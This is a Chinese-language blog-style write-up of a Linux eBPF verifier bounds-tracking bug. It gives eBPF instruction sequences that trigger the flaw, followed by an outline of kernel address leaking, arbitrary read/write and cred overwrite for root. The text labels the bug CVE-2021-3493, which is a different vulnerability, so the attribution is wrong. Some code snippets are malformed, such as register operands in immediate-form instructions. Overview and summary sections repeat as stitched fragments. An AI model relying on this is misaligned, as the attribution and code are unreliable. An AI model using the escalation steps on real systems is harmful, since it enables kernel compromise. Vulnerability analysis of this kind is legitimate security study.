eBPF Verifier漏洞CVE-2021-3493分析与利用<\/h1>

漏洞概述<\/h2>
CVE-2021-3493是Linux内核eBPF验证器中的一个漏洞，允许攻击者绕过验证器的边界检查，导致内核地址泄露和权限提升。该漏洞存在于eBPF验证器对32位和64位寄存器边界值的处理不一致中。<\/p>

漏洞背景<\/h2>
eBPF验证器负责跟踪每个寄存器的边界值（防止越界读写），会对寄存器的每一次运算模拟求解边界值（最大\/最小值）。由于寄存器是64位，但实际参与运算可能是32位，因此需要对32\/64位都进行边界校验。<\/p>

漏洞分析<\/h2>

边界校验机制<\/h3>

验证器使用adjust_scalar_min_max_vals<\/code>和adjust_reg_min_max_vals<\/code>函数完成边界校验：<\/p>

static<\/span> int<\/span> adjust_scalar_min_max_vals<\/span>(struct<\/span> bpf_verifier_env *<\/span>env,
<\/span><\/span>                    struct<\/span> bpf_insn *<\/span>insn,
<\/span><\/span>                    struct<\/span> bpf_reg_state *<\/span>dst_reg,
<\/span><\/span>                    struct<\/span> bpf_reg_state src_reg)
<\/span><\/span>{
<\/span><\/span>    struct<\/span> bpf_reg_state *<\/span>regs =<\/span> cur_regs(env);
<\/span><\/span>    u8 opcode =<\/span> BPF_OP(insn-><\/span>code);
<\/span><\/span>    ...
<\/span><\/span>    switch<\/span> (opcode) {
<\/span><\/span>    case<\/span> BPF_ADD:
<\/span><\/span>        scalar32_min_max_add(dst_reg, &<\/span>src_reg);
<\/span><\/span>        scalar_min_max_add(dst_reg, &<\/span>src_reg);
<\/span><\/span>        break<\/span>;
<\/span><\/span>    case<\/span> BPF_SUB:
<\/span><\/span>        scalar32_min_max_sub(dst_reg, &<\/span>src_reg);
<\/span><\/span>        scalar_min_max_sub(dst_reg, &<\/span>src_reg);
<\/span><\/span>        break<\/span>;
<\/span><\/span>    case<\/span> BPF_MUL:
<\/span><\/span>        scalar32_min_max_mul(dst_reg, &<\/span>src_reg);
<\/span><\/span>        scalar_min_max_mul(dst_reg, &<\/span>src_reg);
<\/span><\/span>        break<\/span>;
<\/span><\/span>    case<\/span> BPF_AND:
<\/span><\/span>        scalar32_min_max_and(dst_reg, &<\/span>src_reg);
<\/span><\/span>        scalar_min_max_and(dst_reg, &<\/span>src_reg);
<\/span><\/span>        break<\/span>;
<\/span><\/span>    ...
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞根源<\/h3>
漏洞出现在32位的BPF_AND<\/code>\/BPF_OR<\/code>\/BPF_XOR<\/code>运算上：<\/p>
static<\/span> void<\/span> scalar32_min_max_and<\/span>(struct<\/span> bpf_reg_state *<\/span>dst_reg,
<\/span><\/span>                struct<\/span> bpf_reg_state *<\/span>src_reg)
<\/span><\/span>{
<\/span><\/span>    bool<\/span> src_known =<\/span> tnum_subreg_is_const(src_reg-><\/span>var_off);
<\/span><\/span>    bool<\/span> dst_known =<\/span> tnum_subreg_is_const(dst_reg-><\/span>var_off);
<\/span><\/span>    
<\/span><\/span>    if<\/span> (src_known &&<\/span> dst_known)
<\/span><\/span>        return<\/span>;  \/\/ 漏洞点：32位已知时不更新边界值
<\/span><\/span><\/span><\/span>    ...
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>与64位处理不同：<\/p>
static<\/span> void<\/span> scalar_min_max_and<\/span>(struct<\/span> bpf_reg_state *<\/span>dst_reg,
<\/span><\/span>                 struct<\/span> bpf_reg_state *<\/span>src_reg)
<\/span><\/span>{
<\/span><\/span>    bool<\/span> src_known =<\/span> tnum_is_const(src_reg-><\/span>var_off);
<\/span><\/span>    bool<\/span> dst_known =<\/span> tnum_is_const(dst_reg-><\/span>var_off);
<\/span><\/span>    
<\/span><\/span>    if<\/span> (src_known &&<\/span> dst_known) {
<\/span><\/span>        __mark_reg_known(dst_reg, dst_reg-><\/span>var_off.value &<\/span> src_reg-><\/span>var_off.value);
<\/span><\/span>        return<\/span>;
<\/span><\/span>    }
<\/span><\/span>    ...
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>关键区别：<\/p>

scalar32_min_max_and<\/code>使用tnum_subreg_is_const<\/code>校验低32位是否已知<\/li>
scalar_min_max_and<\/code>使用tnum_is_const<\/code>校验整个64位是否已知<\/li>
<\/ul>
当寄存器低32位已知而高32位未知时，32位边界值不会被更新，导致验证器与实际运行时状态不一致。<\/p>
边界值更新流程<\/h3>
在adjust_scalar_min_max_vals<\/code>函数返回前，会调用以下函数更新寄存器边界值：<\/p>
__update_reg_bounds(dst_reg);
<\/span><\/span>__reg_deduce_bounds(dst_reg);
<\/span><\/span>__reg_bound_offset(dst_reg);
<\/span><\/span><\/code><\/pre>其中__update_reg32_bounds<\/code>根据reg.var_off<\/code>计算边界值：<\/p>
static<\/span> void<\/span> __update_reg32_bounds<\/span>(struct<\/span> bpf_reg_state *<\/span>reg)
<\/span><\/span>{
<\/span><\/span>    struct<\/span> tnum var32_off =<\/span> tnum_subreg(reg-><\/span>var_off);
<\/span><\/span>    
<\/span><\/span>    reg-><\/span>s32_min_value =<\/span> max_t(s32, reg-><\/span>s32_min_value,
<\/span><\/span>                  var32_off.value |<\/span> (var32_off.mask &<\/span> S32_MIN));
<\/span><\/span>    reg-><\/span>s32_max_value =<\/span> min_t(s32, reg-><\/span>s32_max_value,
<\/span><\/span>                  var32_off.value |<\/span> (var32_off.mask &<\/span> S32_MAX));
<\/span><\/span>    reg-><\/span>u32_min_value =<\/span> max_t(u32, reg-><\/span>u32_min_value, (u32)var32_off.value);
<\/span><\/span>    reg-><\/span>u32_max_value =<\/span> min(reg-><\/span>u32_max_value,
<\/span><\/span>                 (u32)(var32_off.value |<\/span> var32_off.mask));
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞触发示例<\/h3>
构造两个寄存器：<\/p>

R2.var_off = {mask = 0xffffffff00000000, value = 0x01} (低32位已知，高32位未知)<\/li>
R3.var_off = {mask = 0x0, value = 0x100000002} (整个64位已知)<\/li>
<\/ol>
执行BPF_AND(R2, R3)<\/code>运算后：<\/p>

R2.var_off = {mask = 0x100000000, value = 0x0}<\/li>
但R2.u32_min_value=1, R2.u32_max_value=0 (矛盾值)<\/li>
<\/ul>
漏洞利用<\/h2>
利用步骤概述<\/h3>

构造触发漏洞的寄存器状态<\/li>
利用路径混淆绕过验证器检查<\/li>
泄漏内核地址信息<\/li>
构建任意地址读写原语<\/li>
修改进程cred提权<\/li>
<\/ol>
构造寄存器状态<\/h3>
构造R8寄存器（完全已知）：<\/p>
BPF_LD_IMM64(BPF_REG_8, 0x1<\/span>);        \/\/ r8 = 0x1
<\/span><\/span><\/span><\/span>BPF_ALU64_IMM(BPF_LSH, BPF_REG_8, 32<\/span>); \/\/ r8 << 32 == 0x100000000
<\/span><\/span><\/span><\/span>BPF_ALU64_IMM(BPF_ADD, BPF_REG_8, 2<\/span>);  \/\/ r8 += 2 == 0x100000002
<\/span><\/span><\/span><\/code><\/pre>构造R6寄存器（低32位已知，高32位未知）：<\/p>
BPF_MAP_GET(0<\/span>, BPF_REG_5);          \/\/ 从map加载完全未知的值
<\/span><\/span><\/span><\/span>BPF_MOV64_REG(BPF_REG_6, BPF_REG_5); \/\/ r6 = r5
<\/span><\/span><\/span><\/span>BPF_MOV64_IMM(BPF_REG_2, 0xffffffff<\/span>); 
<\/span><\/span>BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 32<\/span>); \/\/ r2 = 0xffffffff00000000
<\/span><\/span><\/span><\/span>BPF_ALU64_IMM(BPF_AND, BPF_REG_6, BPF_REG_2); \/\/ r6 &= r2
<\/span><\/span><\/span><\/span>BPF_ALU64_IMM(BPF_ADD, BPF_REG_6, 0x1<\/span>); \/\/ r6.var_off = {mask=0xffffffff00000000, value=0x01}
<\/span><\/span><\/span><\/code><\/pre>触发漏洞：<\/p>
BPF_ALU64_REG(BPF_AND, BPF_REG_6, BPF_REG_8); \/\/ r6 &= r8
<\/span><\/span><\/span><\/code><\/pre>路径混淆<\/h3>
验证器使用is_branch32_taken<\/code>判断条件分支：<\/p>
static<\/span> int<\/span> is_branch32_taken<\/span>(struct<\/span> bpf_reg_state *<\/span>reg, u32 val, u8 opcode)
<\/span><\/span>{
<\/span><\/span>    switch<\/span> (opcode) {
<\/span><\/span>    case<\/span> BPF_JGE:
<\/span><\/span>        if<\/span> (reg-><\/span>u32_min_value >=<\/span> val) return<\/span> 1<\/span>;
<\/span><\/span>        else<\/span> if<\/span> (reg-><\/span>u32_max_value <<\/span> val) return<\/span> 0<\/span>;
<\/span><\/span>        break<\/span>;
<\/span><\/span>    case<\/span> BPF_JLE:
<\/span><\/span>        if<\/span> (reg-><\/span>u32_max_value <=<\/span> val) return<\/span> 1<\/span>;
<\/span><\/span>        else<\/span> if<\/span> (reg-><\/span>u32_min_value ><\/span> val) return<\/span> 0<\/span>;
<\/span><\/span>        break<\/span>;
<\/span><\/span>    }
<\/span><\/span>    return<\/span> -<\/span>1<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>利用矛盾边界值（umin_value > umax_value）使验证器误判分支路径。<\/p>
信息泄漏<\/h3>
利用adjust_ptr_min_max_vals<\/code>中的特殊处理泄漏内核地址：<\/p>
if<\/span> ((known &&<\/span> (smin_val !=<\/span> smax_val ||<\/span> umin_val !=<\/span> umax_val)) ||<\/span>
<\/span><\/span>    smin_val ><\/span> smax_val ||<\/span> umin_val ><\/span> umax_val) {
<\/span><\/span>    __mark_reg_unknown(env, dst_reg);
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>当scalar寄存器边界矛盾时，指针寄存器会被标记为unknown，从而可以存储在map中。<\/p>
任意地址读写<\/h3>


任意地址读<\/strong>：利用bpf_map->btf<\/code>指针和bpf_obj_get_info_by_fd<\/code><\/p>

修改bpf_array->bpf_map->btf<\/code>为target_addr - 0x58<\/li>
调用bpf_obj_get_info_by_fd<\/code>读取btf->id<\/code>（即target_addr处的值）<\/li>
<\/ul>
<\/li>

任意地址写<\/strong>：替换map->ops->map_push_elem<\/code>为array_map_get_next_key<\/code><\/p>

构造假的ops表，替换map_push_elem<\/code>指针<\/li>
设置map->max_entries = 0xffffffff<\/code><\/li>
设置map->map_type = BPF_MAP_TYPE_STACK<\/code><\/li>
通过bpf_map_update_elem<\/code>触发写操作<\/li>
<\/ul>
<\/li>
<\/ol>
提权<\/h3>

泄漏init_pid_ns<\/code>地址（内核基址+固定偏移）<\/li>
遍历进程链表找到当前进程的task_struct<\/code><\/li>
获取task_struct->cred<\/code>地址<\/li>
使用任意地址写修改cred为root（uid=0）<\/li>
<\/ol>
完整利用代码示例<\/h2>
\/\/ 构造触发漏洞的eBPF程序
<\/span><\/span><\/span><\/span>struct<\/span> bpf_insn prog[] =<\/span> {
<\/span><\/span>    \/\/ 初始化R8 (完全已知)
<\/span><\/span><\/span><\/span>    BPF_LD_IMM64(BPF_REG_8, 0x1<\/span>),
<\/span><\/span>    BPF_ALU64_IMM(BPF_LSH, BPF_REG_8, 32<\/span>),
<\/span><\/span>    BPF_ALU64_IMM(BPF_ADD, BPF_REG_8, 2<\/span>),
<\/span><\/span>    
<\/span><\/span>    \/\/ 初始化R6 (低32位已知)
<\/span><\/span><\/span><\/span>    BPF_MAP_GET(0<\/span>, BPF_REG_5),
<\/span><\/span>    BPF_MOV64_REG(BPF_REG_6, BPF_REG_5),
<\/span><\/span>    BPF_MOV64_IMM(BPF_REG_2, 0xffffffff<\/span>),
<\/span><\/span>    BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 32<\/span>),
<\/span><\/span>    BPF_ALU64_IMM(BPF_AND, BPF_REG_6, BPF_REG_2),
<\/span><\/span>    BPF_ALU64_IMM(BPF_ADD, BPF_REG_6, 0x1<\/span>),
<\/span><\/span>    
<\/span><\/span>    \/\/ 触发漏洞
<\/span><\/span><\/span><\/span>    BPF_ALU64_REG(BPF_AND, BPF_REG_6, BPF_REG_8),
<\/span><\/span>    
<\/span><\/span>    \/\/ 后续利用代码...
<\/span><\/span><\/span><\/span>};
<\/span><\/span>
<\/span><\/span>\/\/ 触发执行
<\/span><\/span><\/span><\/span>int<\/span> write_msg<\/span>() {
<\/span><\/span>    write(sockets[0<\/span>], buffer, sizeof<\/span>(buffer));
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>防御措施<\/h2>

内核更新：修复边界校验不一致问题<\/li>
启用KASLR：增加地址泄漏难度<\/li>
限制eBPF权限：非特权用户禁用敏感操作<\/li>
启用CONFIG_BPF_JIT_ALWAYS_ON：避免解释器路径<\/li>
<\/ol>
总结<\/h2>
CVE-2021-3493展示了eBPF验证器在边界值跟踪上的逻辑缺陷，通过精心构造的寄存器状态可以绕过验证器的安全检查，最终实现内核任意地址读写和权限提升。该漏洞强调了eBPF安全机制中边界条件处理的重要性。<\/p>

eBPF Verifier漏洞CVE-2021-3493分析与利用<\/h1>

漏洞概述<\/h2> CVE-2021-3493是Linux内核eBPF验证器中的一个漏洞，允许攻击者绕过验证器的边界检查，导致内核地址泄露和权限提升。该漏洞存在于eBPF验证器对32位和64位寄存器边界值的处理不一致中。<\/p>

漏洞背景<\/h2> eBPF验证器负责跟踪每个寄存器的边界值（防止越界读写），会对寄存器的每一次运算模拟求解边界值（最大\/最小值）。由于寄存器是64位，但实际参与运算可能是32位，因此需要对32\/64位都进行边界校验。<\/p>

漏洞分析<\/h2>

漏洞利用<\/h2>

总结<\/h2> CVE-2021-3493展示了eBPF验证器在边界值跟踪上的逻辑缺陷，通过精心构造的寄存器状态可以绕过验证器的安全检查，最终实现内核任意地址读写和权限提升。该漏洞强调了eBPF安全机制中边界条件处理的重要性。<\/p>

漏洞概述<\/h2>
CVE-2021-3493是Linux内核eBPF验证器中的一个漏洞，允许攻击者绕过验证器的边界检查，导致内核地址泄露和权限提升。该漏洞存在于eBPF验证器对32位和64位寄存器边界值的处理不一致中。<\/p>

漏洞背景<\/h2>
eBPF验证器负责跟踪每个寄存器的边界值（防止越界读写），会对寄存器的每一次运算模拟求解边界值（最大\/最小值）。由于寄存器是64位，但实际参与运算可能是32位，因此需要对32\/64位都进行边界校验。<\/p>

总结<\/h2>
CVE-2021-3493展示了eBPF验证器在边界值跟踪上的逻辑缺陷，通过精心构造的寄存器状态可以绕过验证器的安全检查，最终实现内核任意地址读写和权限提升。该漏洞强调了eBPF安全机制中边界条件处理的重要性。<\/p>